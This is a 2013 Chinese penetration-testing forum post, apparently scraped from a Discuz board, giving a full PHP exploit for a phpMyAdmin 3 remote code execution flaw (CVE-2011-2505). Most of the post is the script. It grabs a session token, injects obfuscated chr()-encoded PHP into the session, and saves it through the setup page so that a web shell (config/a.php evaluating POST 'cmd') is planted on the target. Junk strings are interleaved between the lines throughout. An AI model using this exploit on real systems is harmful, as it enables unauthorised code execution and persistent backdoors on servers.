中国网络渗透测试联盟
标题:
phpadmin3 remote code execute php版本exploit
[打印本页]
作者:
admin
时间:
2013-2-21 09:13
标题:
phpadmin3 remote code execute php版本exploit
最近在家做专职奶爸,不谙圈内事很多months了,博客也无更新。
( c( k/ t( D, X9 e7 m) h
% M# L( Q) g( h7 j
昨夜带孩子整夜未眠,看到黑哥在php security群里关于phpmyadmin3漏洞的讨论,虽然之前没看过漏洞代码,不过前段时间还是在微博上看到wofeiwo的exp了,不过据黑哥说有不鸡肋的利用方法,于是夜里翻代码出来研究了翻,写出了这个冷饭exp,由于我搞的晚了,之前已经很多人研究了写exp了,于是我这个属于炒冷饭,权当研究研究打发时间了。
, d8 K; h2 A% v: t
+ t T1 S& ]2 c1 v
首先赞下wofeiwo的python版本的exp,再赞下wofeiwo跟superhei的钻研精神,学习的榜样啊。不过之前那个exp利用起来是有一些限制的:
+ r- e K; R" Z. T* ]
一是session.auto_start = 1;
3 _/ \9 T) |" _: ]; @
二是pma3默认代码里libraries目录已经用.htaccess控制了不允许访问。
2 R0 w! u! R4 K4 p% h
当然还有第三点大家都不可以逾越的鸿沟:config目录存在且可写。
. }* _* e) O' a
- a0 \- A" b3 w$ D) K
在群里看了黑哥的发言后,再看了下代码,发现前两点利用限制均可以无视。所以其实这个漏洞还真的可以不是那么鸡肋。
R! N. l2 y% N. ~4 ^9 J/ |4 K
+ K# z& V+ r. S9 x1 |9 W3 d3 J
于是写了这个php版本的exp,代码如下:
5 O/ T; S4 L( Q/ R0 E! M, A9 U
9 M% L% _( V7 n+ {7 Y/ p( @
#!/usr/bin/php
4 o2 T. o1 M) _
<?php
9 y6 Q+ |7 d: v6 X/ ~& M9 Z
print_r('
- K6 }. T: w |- ~. i$ k* ] B
+---------------------------------------------------------------------------+
( H; @3 o9 n' z! p
pma3 - phpMyAdmin3 remote code execute exploit [Not jilei(chicken\'s ribs)]
& Q" E; n8 d" U
by oldjun(
www.oldjun.com
)
! Y! [$ m/ C8 m% P
welcome to
www.t00ls.net
% U% v* i+ k0 x9 i9 {
mail:
oldjun@gmail.com
: m2 f* G5 H1 u" v/ ~* V: S
Assigned CVE id: CVE-2011-2505
8 c# Q2 {+ H1 B, T8 ? K: L0 j
+---------------------------------------------------------------------------+
2 w' P6 g$ ?/ M9 K
');
. a: o# `4 F( y) n) u6 A
. G! [0 ~4 X# ~3 ^- M% a; K
/**
6 D# R* r" v' G: @2 T
* working when the directory:"config" exists and is writeable.
& ]6 }. d& a8 _1 d
**/
' n% C( m0 A5 I) U* |/ l7 a" C
" w1 b C" f4 `% i" \2 a
if ($argc < 3) {
; A8 h" J% C) V e
print_r('
' B0 V0 Y# D9 `) n, y
+---------------------------------------------------------------------------+
0 k; ]- c' ^+ o6 c/ ]
Usage: php '.$argv[0].' host path
0 {+ m t0 @% x6 `/ p! E" h4 X( G
host: target server (ip/hostname)
' p0 B; s9 `* I
path: path to pma3
2 C' }8 }$ F* H) Q9 q
Example:
% m2 E Q# E. O( ]8 s/ }* O
php '.$argv[0].' localhost /pma/
# S9 _# i* x! V* A6 e
+---------------------------------------------------------------------------+
8 ` B& a$ b* `& c) r" a, V4 Y
');
6 [6 a7 u4 Q. I3 B
exit;
; _ u. o8 R+ [; C
}
+ J$ `" N7 K" P! ?8 s2 u+ Z$ [
' U9 K+ |0 X5 }3 S6 y) j2 d& J, e
$host = $argv[1];
7 @" R$ r/ e- e( b) M$ F/ I9 S; G! k
$path = $argv[2];
7 T; I8 o: U7 p& Q* {7 c
: ]) h. o$ r0 s( @3 i7 @ T' [
/**
3 G4 i9 |' c, |# r6 b
* Try to determine if the directory:"config" exists
r ?5 H$ M3 H* }, P
**/
1 p+ [! c/ p# S* Y3 c j
echo "[+] Try to determine if the directory:config exists....\n";
4 i# X8 S; O# H2 u
$returnstr=php_request('config/');
+ E9 u( \8 A- Y9 l8 e
if(strpos($returnstr,'404')){
* {3 d* D2 C" v
exit("[-] Exploit Failed! The directory:config do not exists!\n");
: d" ^3 D/ U9 m) a! Z6 R! _% V; s3 x5 z
}
/ C `& p& J5 W' a7 i' e
1 d; T8 B: P% L# v0 r/ C
/**
7 l- r& x" ]; ?+ m
* Try to get token and sessionid
! V# B% ~$ S5 @# ]
**/
[1 _% x6 h! n1 l" K/ `
echo "[+] Try to get token and sessionid....\n";
8 x, B% f" R! e! d
$result=php_request('index.php');
! K7 l3 j# X; I) e: N: p( }
preg_match('/phpMyAdmin=(\w{32,40})\;(.*?)token=(\w{32})\&/s', $result, $resp);
2 R- ?+ ~& p0 [' U9 |
$token=$resp[3];
. \: B6 }2 u, R2 N8 Z9 B- X/ q
$sessionid=$resp[1];
$ P1 l, ~; g# B( D5 B- K5 n* E
if($token && $sessionid){
1 Y0 U5 n0 w3 E
echo "[+] token
token\n";
0 a# H7 n# @% G0 b* b ?7 L5 O6 u7 g, m
echo "[+] Session ID
sessionid\n";
7 U" _9 L7 S7 [3 u
}else{
# [9 W* ]7 R% d. V$ @$ c
exit("[-] Can't get token and Session ID,Exploit Failed!\n");
6 c, l* z$ L! g8 I9 Y4 R/ ^
}
) @8 I0 K- m' r. Z! |
3 Z @; Q9 @9 ^" j E* |
/**
* J3 ~7 k* U i
* Try to insert shell into session
. k. Y& g( U/ S# B
**/
4 d; R7 M% _( N1 G
echo "[+] Try to insert shell into session....\n";
+ ^: U( y2 l) b7 @
php_request('db_create.php?token='.$token.'&session_to_unset=t00ls&_SESSION[ConfigFile][Servers][*/eval(chr(102).chr(112).chr(117).chr(116).chr(115).chr(40).chr(102).chr(111).chr(112).chr(101).chr(110).chr(40).chr(39).chr(97).chr(46).chr(112).chr(104).chr(112).chr(39).chr(44).chr(39).chr(119).chr(39).chr(41).chr(44).chr(39).chr(60).chr(63).chr(112).chr(104).chr(112).chr(32).chr(101).chr(118).chr(97).chr(108).chr(40).chr(36).chr(95).chr(80).chr(79).chr(83).chr(84).chr(91).chr(99).chr(109).chr(100).chr(93).chr(41).chr(63).chr(62).chr(39).chr(41).chr(59).chr(101).chr(99).chr(104).chr(111).chr(40).chr(39).chr(116).chr(48).chr(48).chr(108).chr(115).chr(39).chr(41).chr(59));/*][host]=t00ls.net','','phpMyAdmin='.$sessionid);//Actually,almost all the php files in home directory of pma3 can be used here.
% R8 T7 t: v, ?, j
2 i/ L$ k, q) n8 @; j) \
/**
/ j9 @ c' b9 o/ l3 W
* Try to create webshell
0 [2 I) Q# Z5 E" l5 S
**/
9 H& l: m0 x( j5 }+ I/ M
echo "[+] Try to create webshell....\n";
" M+ V- z: q; y3 Z
php_request('setup/config.php','phpMyAdmin='.$sessionid.'&tab_hash=&token='.$token.'&check_page_refresh=&DefaultLang=en&ServerDefault=0&eol=unix&submit_save=Save','phpMyAdmin='.$sessionid);
3 c7 u, v- G5 Z& a& f( Q! ], f7 W6 E
/**
3 l- E; e5 h% X ^9 W
* Try to check if the webshell was created successfully
3 U& L' d2 n( B1 @3 ^
**/
5 c4 i( x( {" {( v, j6 O+ d
echo "[+] Try to check if the webshell was created successfully....\n";
0 `, m4 P+ b q% Y8 ^2 G
$content=php_request('config/config.inc.php');
# A4 }2 x. ]4 i+ s& ]# C
if(strpos($content,'t00ls')){
, k+ \( S: O" z1 R6 }$ u% j$ I9 K% K
echo "[+] Congratulations! Expoilt successfully....\n";
& L! h$ k; @ n8 w
echo "[+] Webshell:http://$host{$path}config/a.php eval(\$_POST[cmd])\n";
! d6 ~. A+ g+ r& W
}else{
2 C; |% `1 ?3 w( v3 c7 q
exit("[-] Exploit Failed! Perhaps the directory:config do not exists or is not writeable!\n");
2 z, B/ W. c; {) ? L( M7 {& ~
}
& ] `) q& [$ g9 ]! G9 n& U+ n
V# b; e- e1 d. c5 A0 k; g$ P) r
function php_request($url,$data='',$cookie=''){
6 d9 ? p' i5 K
global $host, $path;
8 }. _5 }+ k- ^* y# c& [: ^6 m
" T- h# F8 I" b5 o* r
$method=$data?'POST':'GET';
}, }' n7 Q% l0 y
, E# o8 ? n/ c! W( w$ E
$packet = $method." ".$path.$url." HTTP/1.1\r\n";
r$ j/ L9 u% I# s, B
$packet .= "Accept: */*\r\n";
% |! C: E, ~: z" a7 v
$packet .= "User-Agent: Mozilla/4.0 (compatible; MSIE 6.00; Windows NT 5.1; SV1)\r\n";
) x3 J/ \, l' J( @7 F5 c) g
$packet .= "Host: $host\r\n";
) O* a8 v( a$ ?+ R& B; A
$packet .= $data?"Content-Type: application/x-www-form-urlencoded\r\n":"";
5 W& Q/ Q. w8 [8 f
$packet .= $data?"Content-Length: ".strlen($data)."\r\n":"";
+ a9 B0 f& T1 ]& x) A
$packet .= $cookie?"Cookie: $cookie\r\n":"";
# M. j' C6 v5 r# N
$packet .= "Connection: Close\r\n\r\n";
" F2 j: X; O8 e6 v! y% W) ^' ?6 ^
$packet .= $data?$data:"";
- I4 {1 O# \, F+ u
4 `9 [4 B0 \( P& p" v' _9 C
$fp = fsockopen(gethostbyname($host), 80);
4 @+ U$ F) G" p* F; w
if (!$fp) {
* ]$ x$ e% j" U$ X$ c( B% t' Z1 X8 ]& ]
echo 'No response from '.$host; die;
. y. C& T9 l9 G# U3 i
}
& |2 i/ ]1 `$ q% z8 ~
fputs($fp, $packet);
8 s _6 @/ S- f# V8 o: M5 b
6 L' s1 n7 N- Y; s/ y: E. `0 K
$resp = '';
$ M; O" r* Z3 w5 \- N7 D% v$ n
0 {: y; u. `5 u! s, d
while ($fp && !feof($fp))
- H/ o) {1 C @( O# Z- g: t: K% C
$resp .= fread($fp, 1024);
$ N- Q* @4 h# M. `- o: S
5 \, F+ N1 C+ I" `
return $resp;
: _ M+ v1 d8 S5 @ p$ j
}
, H7 {3 b8 D0 _; J
# Q0 J: c" c+ E) E8 M- |
?>
1 O7 Z+ z- A* v: \7 {- I
.
欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/)
Powered by Discuz! X3.2